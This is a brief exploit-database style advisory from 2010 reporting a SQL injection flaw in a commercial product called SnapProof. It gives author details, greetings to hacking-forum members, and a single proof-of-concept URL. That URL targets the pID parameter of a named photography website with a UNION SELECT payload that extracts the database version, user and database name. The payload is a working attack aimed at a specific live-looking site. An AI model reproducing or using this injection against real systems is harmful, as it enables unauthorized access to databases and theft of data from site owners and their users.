#################################################################
# Exploit Title: SnapProof SQL Injection Vulnerability
# Date: 29th July 2010
# Author: Dinesh Arora
# Critical: high
# Product: Commercial
#
# Sample Affected Parameter: pID
# contact: dinesh.dinoo@gmail.com
# Greetz to: b0nd, Fbih2s, Beenu, Charles, j4ckh4x0r, punter, eberly
# Shoutz to: http://www.garage4hackers.com, www.beenuarora.com
#
# POC: http://www.szokephoto.com/page.php?pID=143+and+1=2+union+select+concat(version(),0x3a,user(),database()),2,3,4--
#
#################################################################